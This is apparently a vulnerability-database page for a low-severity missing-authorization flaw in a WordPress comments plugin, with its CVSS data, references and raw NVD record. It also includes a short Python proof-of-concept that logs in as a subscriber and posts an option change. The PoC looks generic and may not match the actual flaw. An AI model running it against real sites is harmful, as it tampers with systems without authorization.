CVE-2025-14370

Description

The Quote Comments plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.0.0. This is due to missing authorization checks in the quotecomments_add_admin function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary plugin options via the 'action' parameter.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Quote Comments插件 <= 3.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys
from urllib.parse import urlencode

# Configuration
target_url = "http://target-wordpress-site.com"
username = "attacker"
password = "password"

# Login to WordPress
session = requests.Session()
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/",
    "testcookie": "1"
}
session.post(login_url, data=login_data)

# Exploit the missing authorization vulnerability
# Modify arbitrary plugin options via action parameter
exploit_url = f"{target_url}/wp-admin/admin-post.php"
exploit_data = {
    "action": "update_option",
    "option_name": "quotecomments_enabled",
    "option_value": "0"  # Disable the plugin
}

response = session.post(exploit_url, data=exploit_data)
print(f"Exploitation response status: {response.status_code}")
print(f"Target may be vulnerable if no authorization check is performed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14370
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14370
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14370/
[4] VulDB https://vuldb.com/cve/CVE-2025-14370
[5] https://plugins.trac.wordpress.org/browser/quote-comments/tags/3.0.0/quote-comments.php#L309
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/1ebe0767-db22-4995-bdf1-5ebb48f960e9?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14370", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:54.603", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Quote Comments plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.0.0. This is due to missing authorization checks in the quotecomments_add_admin function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary plugin options via the 'action' parameter."}, {"lang": "es", "value": "El plugin Quote Comments para WordPress es vulnerable a Falta de Autorización en todas las versiones hasta la 3.0.0, inclusive. Esto se debe a la falta de comprobaciones de autorización en la función quotecomments_add_admin. Esto permite que atacantes autenticados, con acceso de nivel Suscriptor y superior, actualicen opciones arbitrarias del plugin a través del parámetro 'action'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/quote-comments/tags/3.0.0/quote-comments.php#L309", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1ebe0767-db22-4995-bdf1-5ebb48f960e9?source=cve", "source": "[email protected]"}]}}